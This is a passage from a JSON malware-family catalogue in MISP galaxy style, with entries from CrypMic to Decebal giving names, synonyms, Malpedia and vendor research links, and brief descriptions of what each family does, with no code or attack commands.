"2fe1dd8c-23d8-40a6-b042-bd2c4012fea6", "value": "CrypMic" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker", "http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html" ], "synonyms": [], "type": [] }, "uuid": "38b38f8c-944d-4062-bf35-561e8a81c8d2", "value": "Crypt0l0cker" }, { "description": "A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot", "https://www.gdatasoftware.com/blog/2020/02/35802-bitbucket-abused-as-malware-slinger" ], "synonyms": [], "type": [] }, "uuid": "2274aaf6-4807-4cda-8f5b-16a757f4ff23", "value": "CryptBot" }, { "description": "CrypticConvo is a dropper trojan which appears to be embedded in an automatic generator framework to deliver the FakeM trojan. According to PaloaltoNetworks CrypticConvo and several additional trojans are believed to be included in a meta framework used by the \"Scarlet Mimic\" threat actor in order to quickly evade AV systems.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptic_convo", "https://unit42.paloaltonetworks.com/scarlet-mimic-years-long-espionage-targets-minority-activists/" ], "synonyms": [], "type": [] }, "uuid": "972fbb7b-6945-42d8-ba88-a7b4e6fc1ad4", "value": "CrypticConvo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptodarkrubix", "https://id-ransomware.blogspot.com/2020/03/cryptodarkrubix-ransomware.html" ], "synonyms": [ "Ranet" ], "type": [] }, "uuid": "c6d09bb2-5673-4b2b-b2cb-5d14f2568189", "value": "CryptoDarkRubix" }, { "description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker", "https://sites.temple.edu/care/ci-rw-attacks/", "https://www.secureworks.com/research/threat-profiles/gold-evergreen", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://www.secureworks.com/research/cryptolocker-ransomware" ], "synonyms": [], "type": [] }, "uuid": "c5a783da-9ff3-4427-84c5-428480b21cc7", "value": "CryptoLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck", "http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/" ], "synonyms": [], "type": [] }, "uuid": "3ec67717-acd5-401b-8e9f-47e79edd07a0", "value": "CryptoLuck" }, { "description": "A variant of CryptoMix is win.clop. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix", "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/", "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/", "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/" ], "synonyms": [ "CryptFile2" ], "type": [] }, "uuid": "55d5742e-20f5-4c9a-887a-4dbd5b37d921", "value": "CryptoMix" }, { "description": "CryptoPatronum is a ransomware that encrypts user data through AES-256 (CBC) and it asks for BTC / ETH in order to get back the original files. In the ransom note there is not a title but only a reference to crsss.exe: its original file name. Once the files are encrypted, CryptoPatronum adds a .enc extension. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptopatronum", "https://id-ransomware.blogspot.com/2020/01/cryptopatronum-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "738acbd6-d0b7-40fd-bc1b-d7fbb74cbbf9", "value": "CryptoPatronum" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptorium", "https://twitter.com/struppigel/status/810770490491043840" ], "synonyms": [], "type": [] }, "uuid": "b7240444-94a6-4d57-a6b3-ca38182eff7a", "value": "Cryptorium" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield", "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/", "http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "6855c491-1b18-4414-9e78-8bc17f0b5b98", "value": "CryptoShield" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler", "https://www.bleepingcomputer.com/news/security/cryptoshuffler-stole-150-000-by-replacing-bitcoin-wallet-ids-in-pc-clipboards/" ], "synonyms": [], "type": [] }, "uuid": "87048a24-7339-4d4e-a141-661cd32a6f1d", "value": "CryptoShuffler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://ryancor.medium.com/genetic-analysis-of-cryptowall-ransomware-843f86055c7f", "https://sites.temple.edu/care/ci-rw-attacks/" ], "synonyms": [], "type": [] }, "uuid": "1cb63b32-cc65-4cdc-945a-e06a88cdd94b", "value": "Cryptowall" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowire", "https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/" ], "synonyms": [], "type": [] }, "uuid": "bc0c1e48-102c-4e6b-9b86-c442c4798159", "value": "CryptoWire" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress", "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/", "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html" ], "synonyms": [], "type": [] }, "uuid": "ae4aa1ef-4da0-4952-9583-9d47f84edad9", "value": "CryptoFortress" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_ransomeware", "https://twitter.com/JaromirHorejsi/status/818369717371027456" ], "synonyms": [], "type": [] }, "uuid": "2f65f056-6cba-4a5b-9aaf-daf31eb76fc2", "value": "CryptoRansomeware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptxxxx", "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/", "https://www.sentinelone.com/blog/sophisticated-new-packer-identified-in-cryptxxx-ransomware-sample/" ], "synonyms": [], "type": [] }, "uuid": "fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8", "value": "CryptXXXX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.csext", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "c6a46f63-3ff1-4952-8350-fad9816b45c9", "value": "CsExt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ctb_locker", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://samvartaka.github.io/malware/2015/11/20/ctb-locker" ], "synonyms": [], "type": [] }, "uuid": "e8e28718-fe55-4d31-8b84-f8ff0acf0614", "value": "CTB Locker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba", "https://id-ransomware.blogspot.com/2019/12/cuba-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "6d9dfc5f-4ebf-404b-ab5e-e6497867fe65", "value": "Cuba Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html", "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal" ], "synonyms": [], "type": [] }, "uuid": "1dc53eb8-ffae-4823-9c11-3c01514398b9", "value": "Cuegoe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry", "https://www.secureworks.com/blog/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761" ], "synonyms": [], "type": [] }, "uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09", "value": "Cueisfry" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cursed_murderer", "https://id-ransomware.blogspot.com/2020/01/thecursedmurderer-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "600a73bf-d699-4400-ac35-6aed4ae5e528", "value": "Cursed Murderer Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet", "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html", "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" ], "synonyms": [], "type": [] }, "uuid": "8945d785-9d43-49ee-b210-4adeb8a24ab9", "value": "Cutlet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail", "http://www.secureworks.com/research/threat-profiles/gold-essex", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.mimecast.com/blog/how-to-slam-a-door-on-the-cutwail-botnet-enforce-dmarc/", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://www.secureworks.com/research/threat-profiles/gold-essex", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/" ], "synonyms": [], "type": [] }, "uuid": "9e8655fc-5bba-4efd-b3c0-db89ee2e0e0b", "value": "Cutwail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", "https://blog.reversinglabs.com/blog/rats-in-the-library", "https://citizenlab.ca/2015/12/packrat-report/" ], "synonyms": [ "Rebhip" ], "type": [] }, "uuid": "062d8577-d6e6-4c97-bcac-eb6eb1a50a8d", "value": "CyberGate" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyber_splitter" ], "synonyms": [], "type": [] }, "uuid": "8bde6075-8c5b-4ff1-be9a-4e2b1d3419aa", "value": "CyberSplitter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot", "https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/" ], "synonyms": [], "type": [] }, "uuid": "dcdd98a7-aad2-4a96-a787-9c4665bbb1b8", "value": "CycBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyrat", "https://www.gdatasoftware.com/blog/cyrat-ransomware", "https://id-ransomware.blogspot.com/2020/08/cyrat-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "1995ed0a-81d9-43ca-9b38-6f001af84bbc", "value": "Cyrat Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cysxl", "https://www.enigmasoftware.com/bkdrcysxla-removal/" ], "synonyms": [], "type": [] }, "uuid": "8db13fca-8f75-44dd-b507-e4d3f9c69d78", "value": "cysxl" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dacls", "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/", "https://blog.netlab.360.com/dacls-the-dual-platform-rat/", "https://www.sygnia.co/mata-framework", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/" ], "synonyms": [], "type": [] }, "uuid": "7c2b19be-f06b-4b21-b003-144e92d291d1", "value": "Dacls (Windows)" }, { "description": "DADJOKE was discovered as being distributed via email, targeting a South-East Asian Ministry of Defense. It is delivered as an embedded EXE file in a Word document using remote templates and a unique macro using multiple GET requests. The payload is deployed using load-order hijacking with a benign Windows Defender executable. Stage 1 has only beacon+download functionality, made to look like a PNG file. Additional analysis by Kaspersky found 8 campaigns over 2019 and no activity prior to January 2019, DADJOKE is attributed with medium confidence to APT40.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke", "https://medium.com/@Sebdraven/apt-40-in-malaysia-61ed9c9642e9", "https://twitter.com/a_tweeter_user/status/1154764787823316993", "https://twitter.com/ClearskySec/status/1110941178231484417", "https://www.youtube.com/watch?v=vx9IB88wXSE", "https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/", "https://wemp.app/posts/80ab2b2d-4e0e-4960-94b7-4d452a06fd38?utm_source=latest-posts" ], "synonyms": [], "type": [] }, "uuid": "3cf1aa5a-c19d-4b50-a604-e445e1e2b4f1", "value": "DADJOKE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache", "https://medium.com/insomniacs/dad-theres-a-rat-in-here-e3729b65bf7a", "https://medium.com/insomniacs/apt40-goes-from-template-injections-to-ole-linkings-for-payload-delivery-99eb43170a97", "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign", "https://danielplohmann.github.io/blog/2020/07/10/kf-sandbox-necromancy.html", "https://twitter.com/killamjr/status/1204584085395517440", "https://twitter.com/cyb3rops/status/1199978327697694720" ], "synonyms": [], "type": [] }, "uuid": "cd9aac83-bdd0-4622-ae77-405d5b9c1dc5", "value": "DADSTACHE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "92960f1f-5099-4e38-a177-14a5e3b8d601", "value": "Dairy" }, { "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", "https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/", "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/", "https://www.proofpoint.com/us/blog/threat-insight/new-year-new-version-danabot", "https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github", "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html", "https://asert.arbornetworks.com/danabots-travels-a-global-perspective/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://malwareandstuff.com/deobfuscating-danabots-api-hashing/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://research.checkpoint.com/danabot-demands-a-ransom-payment/", "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", "https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/", "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/", "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/" ], "synonyms": [], "type": [] }, "uuid": "4f7decd4-054b-4dd7-89cc-9bdb248f7c8a", "value": "DanaBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot", "https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf", "https://www.secureworks.com/research/threat-profiles/cobalt-lyceum", "https://otx.alienvault.com/pulse/5d4301edb3f3406ac01acc0f", "https://cyberx-labs.com/blog/deep-dive-into-the-lyceum-danbot-malware/" ], "synonyms": [], "type": [] }, "uuid": "98d3c6b3-c29f-46ba-b24d-88b135cd3183", "value": "danbot" }, { "description": "DarkComet is one of the most famous RATs, developed by Jean-Pierre Lesueur in 2008. After being used in the Syrian civil war in 2011, Lesuer decided to stop developing the trojan. Indeed, DarkComet is able to enable control over a compromised system through use of a simple graphic user interface. Experts think that this user friendliness is the key of its mass success.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://content.fireeye.com/apt/rpt-apt38", "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", "https://www.sysnet.ucsd.edu/sysnet/miscpapers/darkmatter-www20.pdf", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/", "https://www.tgsoft.it/files/report/download.asp?id=7481257469", "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.DarkComet", "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/" ], "synonyms": [ "Breut", "Fynloski", "klovbot" ], "type": [] }, "uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591", "value": "DarkComet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi", "http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html", "http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html" ], "synonyms": [], "type": [] }, "uuid": "3521faaa-1136-4e50-9fe2-3f33359e8b1d", "value": "DarkMegi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon", "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html", "https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml", "http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html" ], "synonyms": [ "Chymine" ], "type": [] }, "uuid": "81ca4876-b4a4-43e9-b8a9-8a88709dd3d2", "value": "Darkmoon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar", "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" ], "synonyms": [], "type": [] }, "uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0", "value": "DarkPulsar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkrat", "https://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md" ], "synonyms": [], "type": [] }, "uuid": "bcff979f-2b4b-41cc-86c9-fe1ea3adce6e", "value": "DarkRat" }, { "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell" ], "synonyms": [], "type": [] }, "uuid": "7fcb9d77-a685-4705-86f0-e62a7302e836", "value": "DarkShell" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside", "https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://ghoulsec.medium.com/mal-series-13-darkside-ransomware-c13d893c36a6", "https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/", "https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html", "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", "https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/", "https://id-ransomware.blogspot.com/2020/08/darkside-ransomware.html", "https://www.databreachtoday.com/blogs/darkside-ransomware-gang-launches-affiliate-program-p-2968", "https://www.acronis.com/en-us/articles/darkside-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "625bcba0-faab-468e-b5ab-61116cb1b5cf", "value": "DarkSide" }, { "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky", "http://telegra.ph/Analiz-botneta-DarkSky-12-30", "https://blog.radware.com/security/2018/02/darksky-botnet/" ], "synonyms": [], "type": [] }, "uuid": "d5f2e3c4-adf4-4156-98b1-b207f70522bb", "value": "Darksky" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkstrat", "https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/" ], "synonyms": [], "type": [] }, "uuid": "b9692126-e6e9-4ab3-8494-959fd1269ff4", "value": "DarkStRat" }, { "description": "Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila", "https://securelist.com/dark-tequila-anejo/87528/" ], "synonyms": [], "type": [] }, "uuid": "374080b4-5e6c-4992-a7f5-def1f2975494", "value": "DarkTequila" }, { "description": "DtBackdoor", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat", "https://www.facebook.com/darktrackrat/", "https://cracked.to/Thread-Release-RAT-Dark-track-alien-4-1", "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml", "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html", "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf", "https://www.tgsoft.it/files/report/download.asp?id=7481257469" ], "synonyms": [], "type": [] }, "uuid": "fc91803f-610c-4ad5-ba0c-b78d65abc6db", "value": "Darktrack RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", "https://www.secureworks.com/research/threat-profiles/bronze-butler", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/" ], "synonyms": [ "Muirim", "Nioupale" ], "type": [] }, "uuid": "70f6c71f-bc0c-4889-86e3-ef04e5b8415b", "value": "Daserf" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper", "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/", "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "https://www.macnica.net/mpressioncss/feature_05.html/", "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf" ], "synonyms": [], "type": [] }, "uuid": "827490bf-19b8-4d14-83b3-7da67fbe436c", "value": "Datper" }, { "description": "This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader", "https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html", "https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands", "https://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/" ], "synonyms": [ "ModiLoader", "NatsoLoader" ], "type": [] }, "uuid": "17e0756b-6cc6-4c25-825c-5fd85c236218", "value": "DBatLoader" }, { "description": "DCRat is a typical RAT that has been around since at least June 2019.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat", "https://tccontre.blogspot.com/2019/10/dcrat-malware-evades-sandbox-that-use.html", "https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html" ], "synonyms": [ "DarkCrystal RAT" ], "type": [] }, "uuid": "b32ffb50-8ef1-4c78-a71a-bb23089b4de6", "value": "DCRat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkeylogger", "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators" ], "synonyms": [], "type": [] }, "uuid": "78796a09-cac4-47fc-9e31-9f2ff5b8e377", "value": "DDKeylogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong", "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/", "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" ], "synonyms": [], "type": [] }, "uuid": "cae8384d-b01b-4f9c-a31b-f693e12ea6b2", "value": "DDKONG" }, { "description": "Also known as Wacatac ransomware due to its .wctc extension.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deathransom", "https://www.fortinet.com/blog/threat-research/death-ransom-attribution.html", "https://asec.ahnlab.com/1269", "https://dissectingmalwa.re/quick-and-painless-reversing-deathransom-wacatac.html", "https://www.fortinet.com/blog/threat-research/death-ransom-new-strain-ransomware.html", "https://id-ransomware.blogspot.com/2019/11/wacatac-ransomware.html", "https://twitter.com/Amigo_A_/status/1196898012645220354", "https://github.com/albertzsigovits/malware-notes/blob/master/DeathRansom.md" ], "synonyms": [ "deathransom", "wacatac" ], "type": [] }, "uuid": "2bc6623a-d7d6-48fc-af79-647648f455aa", "value": "DeathRansom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.decebal", "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf", "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html" ], "synonyms": [], "type": [] }, "uuid": "fba088fb-2659-48c3-921b-12c6791e6d58", "value": "Decebal" }, { 